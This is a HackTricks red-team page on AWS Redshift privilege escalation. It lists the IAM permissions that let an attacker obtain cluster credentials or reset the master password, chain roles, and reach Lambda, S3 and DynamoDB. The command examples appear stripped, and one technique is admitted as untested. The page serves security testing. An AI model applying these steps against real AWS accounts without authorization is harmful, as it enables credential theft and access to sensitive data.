Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
For more information about RDS check:
AWS - Redshift Enum
redshift:DescribeClusters, redshift:GetClusterCredentialsWith these permissions you can get info of all the clusters (including name and cluster username) and get credentials to access it:
Potential Impact: Find sensitive info inside the databases.
redshift:DescribeClusters, redshift:GetClusterCredentialsWithIAMWith these permissions you can get info of all the clusters and get credentials to access it. Note that the postgres user will have the permissions that the IAM identity used to get the credentials has.
Potential Impact: Find sensitive info inside the databases.
redshift:DescribeClusters, redshift:ModifyCluster?It's possible to modify the master password of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet):
Potential Impact: Find sensitive info inside the databases.
To access all the following resources, you will need to specify the role to use. A Redshift cluster can have assigned a list of AWS roles that you can use if you know the ARN or you can just set "default" to use the default one assigned.
Moreover, as explained here, Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just separating them with a comma: iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';
As explained in https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html, it's possible to call a lambda function from redshift with something like:
As explained in https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html, it's possible to read and write into S3 buckets:
As explained in https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html, it's possible to get data from dynamodb:
The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the REGION option to specify the AWS Region in which the Amazon DynamoDB table is located.
Check https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
